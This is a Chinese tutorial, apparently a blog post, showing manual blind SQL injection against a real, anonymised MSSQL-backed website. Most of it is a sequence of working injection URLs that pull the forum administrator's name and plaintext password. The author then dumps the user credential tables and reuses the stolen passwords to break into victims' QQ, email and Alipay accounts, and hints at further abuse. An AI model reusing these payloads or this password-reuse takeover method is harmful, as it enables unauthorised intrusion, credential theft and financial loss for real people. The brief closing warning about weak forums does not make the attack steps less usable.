手工注入+社会工程学=小试牛刀
用工具用多了是不是感到厌烦啊,今天就给大家带来一篇手工注入
的文章。以下面的网站为例,呵呵,该漏洞已通知管理员。
先简单判断数据库类型:
http://XXXX/mathweb/PageMath/FrontPage/WebFrm_PhotoNews.aspx?pid=127%20and%20user%20>0
是mssql数据库,而且是sa权限啊,呵呵
看见有论坛,试试常用表,一直到bbs_user时 成功!提交如下:
http://XXXX/mathweb/PageMath/FrontPage/WebFrm_PhotoNews.aspx?pid=127%20and%20exists%20(select%20*%20from%20bbs_user)
猜字段:
http://XXXX/mathweb/PageMath/FrontPage/WebFrm_PhotoNews.aspx?pid=127%20and%20exists%20(select%20count(user)%20from%20bbs_user)
有user这个字段 其他就不知道了,一般命名有规律,先去论坛注册区看看吧
如下:
看见注册信息了吗,
也许有id,user_admin,user_qq,user_email ,user_name等字段呢,试试看
http://XXXX/mathweb/PageMath/FrontPage/WebFrm_PhotoNews.aspx?pid=127%20and%20(select%20count(user_pass)%20from%20bbs_user)>0
正常返回,再试:
http://XXXX/mathweb/PageMath/FrontPage/WebFrm_PhotoNews.aspx?pid=127%20and%20exists(select%20id%20from%20bbs_user)
正常返回,
经试验可知,有这几个字段,
再提交:
http://XXXX/mathweb/PageMath/FrontPage/WebFrm_PhotoNews.aspx?pid=127%20and%20exists(select%20id%20from%20bbs_user%20where%20id=1)
正常返回,说明有id=1的管理员,就不截图了,
我们只对管理员有兴趣,呵呵,继续来,
猜长度:
http://XXXX/mathweb/PageMath/FrontPage/WebFrm_PhotoNews.aspx?pid=127%20and%20exists(select%20id%20from%20bbs_user%20where%20id=1and%20len(user_admin)<6)
正常:
难道是admin?
输入:
http://XXXX/mathweb/PageMath/FrontPage/WebFrm_PhotoNews.aspx?pid=127%20and%20exists(select%20id%20from%20bbs_user%20where%20id=1and%20len(user_admin)=6)
成功,大概是admin,
猜名字的asc码:
http://XXXX/mathweb/PageMath/FrontPage/WebFrm_PhotoNews.aspx?pid=127%20and%20exists(select%20id%20from%20bbs_user%20where%20id=1and%20unicode(substring(user_admin,1,1))=97)
正常返回,由asc转换工具知为a,基本上定了是admin,b的码为100,直接:
http://XXXX/mathweb/PageMath/FrontPage/WebFrm_PhotoNews.aspx?pid=127%20and%20exists(select%20id%20from%20bbs_user%20where%20id=1and%20unicode(substring(user_admin,2,1))=100)
正常返回:
重复这种方法,知管理员的账号为admin
猜密码:密码是储存在user_pass这张表中的,
先猜长度,慢慢来,急不得啊,
反复试后,在提交:
http://XXXX/mathweb/PageMath/FrontPage/WebFrm_PhotoNews.aspx?pid=127%20and%20exists(select%20id%20from%20bbs_user%20where%20id=1and%20len(user_pass)=4)
时,返回正常页面,
知密码长度为4位。
判断是不是明文储存,不要认为明文储存没有市场,呵呵,提交:
http://XXXX/mathweb/PageMath/FrontPage/WebFrm_PhotoNews.aspx?pid=127%20and%20exists(select%20id%20from%20bbs_user%20where%20id=1and%20user_pass<10000000000)
是明文储存的,晕啊,
提交:
http://XXXX/mathweb/PageMath/FrontPage/WebFrm_PhotoNews.aspx?pid=127%20and%20exists(select%20id%20from%20bbs_user%20where%20id=1and%20substring(user_pass,1,1)=2)
出错,再提交3、4、5、6、7都出错,到8时正常返回
即密码的第一位为8,呵呵
如法炮制,得到整个密码为8201,
得到管理员账号,我们进去看看有没有可利用的东西,
到处转了转,太简陋了,
就一个图片上传有用,但没有其它功能配合也没用啊。
别灰心啊,因为是sa权限嘛,
所以逛了一圈,导出了几个文件,一个是系统管理员列表,有密码奥,
另一个是论坛用户账号密码列表。本想结束了,但一想忙了这么长时间,不能白干吧,就用用传说中的社会工程学原理,看看论坛账号吧,呵呵
账号表:
表上有qq号,这是突破口,呵呵,有许多人都用同样的密码,给了我们机会啊,
用论坛密码登陆用户的qq,如图,成功了,有很多呢,冲q币?呵呵,
再打开他的信箱看看,如图:
有支付宝啊,
进来看看:
大家对这个页面是不是很熟悉啊,呵呵。
还有很多重要的东西,例如:
到这里也该结束了,不过沿着这个思路想,既然密码通用,是不是校内也可以上呢,呵呵,其他的自己想吧。
在这也提醒各位:不要随便在一些烂论坛上注册,以免自己重要的信息泄露,引起重大损失!
浙公网安备 33010602011771号